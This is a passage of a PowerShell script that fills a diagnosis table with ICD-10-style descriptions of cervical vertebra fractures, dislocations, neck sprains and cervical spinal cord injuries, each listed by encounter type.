spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of sixth cervical vertebra","Type III traumatic spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of sixth cervical vertebra","Type III traumatic spondylolisthesis of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of sixth cervical vertebra","Other traumatic displaced spondylolisthesis of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of sixth cervical vertebra","Other traumatic displaced spondylolisthesis of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of sixth cervical vertebra","Other traumatic displaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of sixth cervical vertebra","Other traumatic displaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of sixth cervical vertebra","Other traumatic displaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of sixth cervical vertebra","Other traumatic displaced spondylolisthesis of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of sixth cervical vertebra","Other displaced fracture of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of sixth cervical vertebra","Other displaced fracture of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of sixth cervical vertebra","Other displaced fracture of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of sixth cervical vertebra","Other displaced fracture of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of sixth cervical vertebra","Other displaced fracture of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of sixth cervical vertebra","Other displaced fracture of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of sixth cervical vertebra","Other nondisplaced fracture of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of sixth cervical vertebra","Other nondisplaced fracture of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of sixth cervical vertebra","Other nondisplaced fracture of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of sixth cervical vertebra","Other nondisplaced fracture of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of sixth cervical vertebra","Other nondisplaced fracture of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of sixth cervical vertebra","Other nondisplaced fracture of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of seventh cervical vertebra","Unspecified displaced fracture of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of seventh cervical vertebra","Unspecified displaced fracture of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of seventh cervical vertebra","Unspecified displaced fracture of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of seventh cervical vertebra","Unspecified displaced fracture of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of seventh cervical vertebra","Unspecified displaced fracture of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of seventh cervical vertebra","Unspecified displaced fracture of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of seventh cervical vertebra","Unspecified nondisplaced fracture of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of seventh cervical vertebra","Unspecified nondisplaced fracture of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of seventh cervical vertebra","Unspecified nondisplaced fracture of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of seventh cervical vertebra","Unspecified nondisplaced fracture of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of seventh cervical vertebra","Unspecified nondisplaced fracture of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of seventh cervical vertebra","Unspecified nondisplaced fracture of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic displaced spondylolisthesis of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of seventh cervical vertebra","Type III traumatic spondylolisthesis of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of seventh cervical vertebra","Type III traumatic spondylolisthesis of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of seventh cervical vertebra","Type III traumatic spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of seventh cervical vertebra","Type III traumatic spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of seventh cervical vertebra","Type III traumatic spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of seventh cervical vertebra","Type III traumatic spondylolisthesis of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of seventh cervical vertebra","Other traumatic displaced spondylolisthesis of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of seventh cervical vertebra","Other traumatic displaced spondylolisthesis of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of seventh cervical vertebra","Other traumatic displaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of seventh cervical vertebra","Other traumatic displaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of seventh cervical vertebra","Other traumatic displaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of seventh cervical vertebra","Other traumatic displaced spondylolisthesis of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra","Other traumatic nondisplaced spondylolisthesis of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of seventh cervical vertebra","Other displaced fracture of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of seventh cervical vertebra","Other displaced fracture of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of seventh cervical vertebra","Other displaced fracture of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of seventh cervical vertebra","Other displaced fracture of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of seventh cervical vertebra","Other displaced fracture of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of seventh cervical vertebra","Other displaced fracture of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of seventh cervical vertebra","Other nondisplaced fracture of seventh cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of seventh cervical vertebra","Other nondisplaced fracture of seventh cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of seventh cervical vertebra","Other nondisplaced fracture of seventh cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of seventh cervical vertebra","Other nondisplaced fracture of seventh cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of seventh cervical vertebra","Other nondisplaced fracture of seventh cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of seventh cervical vertebra","Other nondisplaced fracture of seventh cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of neck","Fracture of other parts of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of neck","Fracture of other parts of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of neck","Fracture of other parts of neck, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of neck, unspecified","Fracture of neck, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Fracture of neck, unspecified","Fracture of neck, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fracture of neck, unspecified","Fracture of neck, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of cervical intervertebral disc","Traumatic rupture of cervical intervertebral disc, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of cervical intervertebral disc","Traumatic rupture of cervical intervertebral disc, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of cervical intervertebral disc","Traumatic rupture of cervical intervertebral disc, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified cervical vertebrae","Subluxation of unspecified cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified cervical vertebrae","Subluxation of unspecified cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified cervical vertebrae","Subluxation of unspecified cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified cervical vertebrae","Dislocation of unspecified cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified cervical vertebrae","Dislocation of unspecified cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified cervical vertebrae","Dislocation of unspecified cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of C0/C1 cervical vertebrae","Subluxation of C0/C1 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C0/C1 cervical vertebrae","Subluxation of C0/C1 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C0/C1 cervical vertebrae","Subluxation of C0/C1 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of C0/C1 cervical vertebrae","Dislocation of C0/C1 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C0/C1 cervical vertebrae","Dislocation of C0/C1 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C0/C1 cervical vertebrae","Dislocation of C0/C1 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of C1/C2 cervical vertebrae","Subluxation of C1/C2 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C1/C2 cervical vertebrae","Subluxation of C1/C2 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C1/C2 cervical vertebrae","Subluxation of C1/C2 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of C1/C2 cervical vertebrae","Dislocation of C1/C2 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C1/C2 cervical vertebrae","Dislocation of C1/C2 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C1/C2 cervical vertebrae","Dislocation of C1/C2 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of C2/C3 cervical vertebrae","Subluxation of C2/C3 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C2/C3 cervical vertebrae","Subluxation of C2/C3 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C2/C3 cervical vertebrae","Subluxation of C2/C3 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of C2/C3 cervical vertebrae","Dislocation of C2/C3 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C2/C3 cervical vertebrae","Dislocation of C2/C3 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C2/C3 cervical vertebrae","Dislocation of C2/C3 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of C3/C4 cervical vertebrae","Subluxation of C3/C4 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C3/C4 cervical vertebrae","Subluxation of C3/C4 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C3/C4 cervical vertebrae","Subluxation of C3/C4 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of C3/C4 cervical vertebrae","Dislocation of C3/C4 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C3/C4 cervical vertebrae","Dislocation of C3/C4 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C3/C4 cervical vertebrae","Dislocation of C3/C4 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of C4/C5 cervical vertebrae","Subluxation of C4/C5 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C4/C5 cervical vertebrae","Subluxation of C4/C5 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C4/C5 cervical vertebrae","Subluxation of C4/C5 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of C4/C5 cervical vertebrae","Dislocation of C4/C5 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C4/C5 cervical vertebrae","Dislocation of C4/C5 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C4/C5 cervical vertebrae","Dislocation of C4/C5 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of C5/C6 cervical vertebrae","Subluxation of C5/C6 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C5/C6 cervical vertebrae","Subluxation of C5/C6 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C5/C6 cervical vertebrae","Subluxation of C5/C6 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of C5/C6 cervical vertebrae","Dislocation of C5/C6 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C5/C6 cervical vertebrae","Dislocation of C5/C6 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C5/C6 cervical vertebrae","Dislocation of C5/C6 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of C6/C7 cervical vertebrae","Subluxation of C6/C7 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C6/C7 cervical vertebrae","Subluxation of C6/C7 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C6/C7 cervical vertebrae","Subluxation of C6/C7 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of C6/C7 cervical vertebrae","Dislocation of C6/C7 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C6/C7 cervical vertebrae","Dislocation of C6/C7 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C6/C7 cervical vertebrae","Dislocation of C6/C7 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of C7/T1 cervical vertebrae","Subluxation of C7/T1 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C7/T1 cervical vertebrae","Subluxation of C7/T1 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of C7/T1 cervical vertebrae","Subluxation of C7/T1 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of C7/T1 cervical vertebrae","Dislocation of C7/T1 cervical vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C7/T1 cervical vertebrae","Dislocation of C7/T1 cervical vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of C7/T1 cervical vertebrae","Dislocation of C7/T1 cervical vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of neck","Dislocation of unspecified parts of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of neck","Dislocation of unspecified parts of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of neck","Dislocation of unspecified parts of neck, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of neck","Dislocation of other parts of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of neck","Dislocation of other parts of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of neck","Dislocation of other parts of neck, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of cervical spine","Sprain of ligaments of cervical spine, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of cervical spine","Sprain of ligaments of cervical spine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of cervical spine","Sprain of ligaments of cervical spine, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of thyroid region","Sprain of thyroid region, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of thyroid region","Sprain of thyroid region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of thyroid region","Sprain of thyroid region, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of other parts of neck","Sprain of joints and ligaments of other parts of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of other parts of neck","Sprain of joints and ligaments of other parts of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of other parts of neck","Sprain of joints and ligaments of other parts of neck, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of unspecified parts of neck","Sprain of joints and ligaments of unspecified parts of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of unspecified parts of neck","Sprain of joints and ligaments of unspecified parts of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of unspecified parts of neck","Sprain of joints and ligaments of unspecified parts of neck, sequela") + $null = $DiagnosisList.Rows.Add("Concussion and edema of cervical spinal cord","Concussion and edema of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Concussion and edema of cervical spinal cord","Concussion and edema of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Concussion and edema of cervical spinal cord","Concussion and edema of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C1 level of cervical spinal cord","Unspecified injury at C1 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C1 level of cervical spinal cord","Unspecified injury at C1 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C1 level of cervical spinal cord","Unspecified injury at C1 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C2 level of cervical spinal cord","Unspecified injury at C2 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C2 level of cervical spinal cord","Unspecified injury at C2 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C2 level of cervical spinal cord","Unspecified injury at C2 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C3 level of cervical spinal cord","Unspecified injury at C3 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C3 level of cervical spinal cord","Unspecified injury at C3 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C3 level of cervical spinal cord","Unspecified injury at C3 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C4 level of cervical spinal cord","Unspecified injury at C4 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C4 level of cervical spinal cord","Unspecified injury at C4 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C4 level of cervical spinal cord","Unspecified injury at C4 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C5 level of cervical spinal cord","Unspecified injury at C5 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C5 level of cervical spinal cord","Unspecified injury at C5 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C5 level of cervical spinal cord","Unspecified injury at C5 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C6 level of cervical spinal cord","Unspecified injury at C6 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C6 level of cervical spinal cord","Unspecified injury at C6 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C6 level of cervical spinal cord","Unspecified injury at C6 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C7 level of cervical spinal cord","Unspecified injury at C7 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C7 level of cervical spinal cord","Unspecified injury at C7 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C7 level of cervical spinal cord","Unspecified injury at C7 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C8 level of cervical spinal cord","Unspecified injury at C8 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C8 level of cervical spinal cord","Unspecified injury at C8 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at C8 level of cervical spinal cord","Unspecified injury at C8 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at unspecified level of cervical spinal cord","Unspecified injury at unspecified level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at unspecified level of cervical spinal cord","Unspecified injury at unspecified level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at unspecified level of cervical spinal cord","Unspecified injury at unspecified level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at C1 level of cervical spinal cord","Complete lesion at C1 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C1 level of cervical spinal cord","Complete lesion at C1 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C1 level of cervical spinal cord","Complete lesion at C1 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at C2 level of cervical spinal cord","Complete lesion at C2 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C2 level of cervical spinal cord","Complete lesion at C2 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C2 level of cervical spinal cord","Complete lesion at C2 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at C3 level of cervical spinal cord","Complete lesion at C3 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C3 level of cervical spinal cord","Complete lesion at C3 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C3 level of cervical spinal cord","Complete lesion at C3 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at C4 level of cervical spinal cord","Complete lesion at C4 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete 